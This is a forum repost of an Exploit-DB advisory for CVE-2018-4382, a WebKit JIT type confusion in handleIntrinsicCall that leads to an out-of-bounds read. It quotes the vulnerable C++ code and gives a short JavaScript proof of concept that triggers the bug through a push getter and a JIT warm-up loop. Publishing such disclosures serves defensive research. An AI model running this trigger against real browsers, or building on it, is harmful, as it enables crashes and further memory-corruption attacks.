Exploit WebKit JIT - 'ByteCodeParser::handleIntrinsicCall' Type Confusion

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
45911
Проверка EDB
  1. Пройдено
Автор
GOOGLE SECURITY RESEARCH
Тип уязвимости
DOS
Платформа
MULTIPLE
CVE
cve-2018-4382
Дата публикации
2018-11-29
WebKit JIT - 'ByteCodeParser::handleIntrinsicCall' Type Confusion
Код:
/*
    case ArrayPushIntrinsic: {
        ...

        if (static_cast<unsigned>(argumentCountIncludingThis) >= MIN_SPARSE_ARRAY_INDEX)
            return false;

        ArrayMode arrayMode = getArrayMode(m_currentInstruction[OPCODE_LENGTH(op_call) - 2].u.arrayProfile, Array::Write);
        
        ...
    }

This code always assumes that the current instruction is an op_call instruction. But that code can be reached from op_get_by_id or op_get_by_val instructions using getters. As an op_get_by_val instruction is smaller than an op_call instruction in size, this also can lead to an OOB read.

Note that the handlers for ArraySliceIntrinsic, ArrayIndexOfIntrinsic and ArrayPopIntrinsic have the same pattern.

PoC:
*/

Array.prototype.__defineGetter__('a', Array.prototype.push);

function opt() {
    let arr = new Array(1, 2, 3, 4);
    arr['a' + ''];
}

for (let i = 0; i < 1000; i++) {
    opt();
}
 
Источник
www.exploit-db.com

Похожие темы